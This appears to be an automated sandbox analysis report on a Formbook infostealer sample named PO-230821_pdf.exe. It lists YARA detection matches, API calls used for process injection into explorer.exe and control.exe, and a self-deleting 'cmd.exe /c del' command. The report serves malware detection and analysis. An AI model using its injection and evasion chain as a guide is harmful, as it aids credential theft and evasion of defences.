Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: PO-230821_pdf.exe PID: 7080, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PO-230821_pdf.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 6216, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403640

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_00406D5F	0_2_00406D5F
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_10006332	0_2_10006332
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_024508B7	0_2_024508B7
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_02450A3B	0_2_02450A3B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041D956	2_2_0041D956
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041E566	2_2_0041E566
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041D5AC	2_2_0041D5AC
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00409E4B	2_2_00409E4B
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041EF08	2_2_0041EF08
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3B090	2_2_00A3B090
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1F0D2	2_2_00A1F0D2
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A20060	2_2_00A20060
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A7705A	2_2_00A7705A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A4B1B0	2_2_00A4B1B0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AEF180	2_2_00AEF180
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A35170	2_2_00A35170
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A1D2AC	2_2_00A1D2AC
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A3E2E0	2_2_00A3E2E0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00AFA376	2_2_00AFA376
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A21340	2_2_00A21340
Source: C:\Windows\explorer.exe	Code function: 3_2_10824082	3_2_10824082
Source: C:\Windows\explorer.exe	Code function: 3_2_1082D036	3_2_1082D036
Source: C:\Windows\explorer.exe	Code function: 3_2_108315CD	3_2_108315CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10825D02	3_2_10825D02
Source: C:\Windows\explorer.exe	Code function: 3_2_1082B912	3_2_1082B912
Source: C:\Windows\explorer.exe	Code function: 3_2_1082E232	3_2_1082E232
Source: C:\Windows\explorer.exe	Code function: 3_2_10828B32	3_2_10828B32
Source: C:\Windows\explorer.exe	Code function: 3_2_10828B30	3_2_10828B30
Source: C:\Windows\explorer.exe	Code function: 3_2_11396232	3_2_11396232
Source: C:\Windows\explorer.exe	Code function: 3_2_11390B30	3_2_11390B30
Source: C:\Windows\explorer.exe	Code function: 3_2_11390B32	3_2_11390B32
Source: C:\Windows\explorer.exe	Code function: 3_2_11393912	3_2_11393912
Source: C:\Windows\explorer.exe	Code function: 3_2_1138DD02	3_2_1138DD02
Source: C:\Windows\explorer.exe	Code function: 3_2_113995CD	3_2_113995CD
Source: C:\Windows\explorer.exe	Code function: 3_2_11395036	3_2_11395036
Source: C:\Windows\explorer.exe	Code function: 3_2_1138C082	3_2_1138C082

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: String function: 00A1B8D0 appears 35 times

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A350 NtCreateFile,	2_2_0041A350
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A400 NtReadFile,	2_2_0041A400
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A480 NtClose,	2_2_0041A480
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A530 NtAllocateVirtualMemory,	2_2_0041A530
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A34A NtCreateFile,	2_2_0041A34A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A3FA NtReadFile,	2_2_0041A3FA
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A47A NtClose,	2_2_0041A47A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_0041A52A NtAllocateVirtualMemory,	2_2_0041A52A
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A629C0 NtReadFile,LdrInitializeThunk,	2_2_00A629C0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62AE0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_00A62AE0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62A50 NtClose,LdrInitializeThunk,	2_2_00A62A50
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62B90 NtQueryInformationToken,LdrInitializeThunk,	2_2_00A62B90
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62B60 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_00A62B60
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62CE0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_00A62CE0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62CC0 NtDelayExecution,LdrInitializeThunk,	2_2_00A62CC0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62C20 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_00A62C20
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62C00 NtMapViewOfSection,LdrInitializeThunk,	2_2_00A62C00
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62D90 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_00A62D90
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62D70 NtReadVirtualMemory,LdrInitializeThunk,	2_2_00A62D70
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62EA0 NtResumeThread,LdrInitializeThunk,	2_2_00A62EA0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62E80 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00A62E80
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62ED0 NtCreateFile,LdrInitializeThunk,	2_2_00A62ED0
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A62E20 NtCreateSection,LdrInitializeThunk,	2_2_00A62E20
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 2_2_00A64230 NtSetContextThread,	2_2_00A64230
Source: C:\Windows\explorer.exe	Code function: 3_2_11396232 NtCreateFile,	3_2_11396232
Source: C:\Windows\explorer.exe	Code function: 3_2_11397E12 NtProtectVirtualMemory,	3_2_11397E12
Source: C:\Windows\explorer.exe	Code function: 3_2_11397E0A NtProtectVirtualMemory,	3_2_11397E0A

Source: PO-230821_pdf.exe, 00000000.00000003.1081091195.000000000350D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000000.00000003.1061552946.0000000003333000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027BC000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000970000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000CC0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
Source: PO-230821_pdf.exe, 00000002.00000003.1079126719.00000000007C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: PO-230821_pdf.exe	ReversingLabs: Detection: 68%
Source: PO-230821_pdf.exe	Virustotal: Detection: 42%

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

File read: C:\Users\user\Desktop\PO-230821_pdf.exe

Jump to behavior

Source: PO-230821_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exe
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Process created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-230821_pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Process created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-230821_pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

0_2_00403640

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsl6B0F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/3@9/8

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-230821_pdf.exe

Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AB5

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03

Source: PO-230821_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: PO-230821_pdf.exe, 00000000.00000003.1071081018.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000000.00000003.1061552946.0000000003210000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-230821_pdf.exe, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
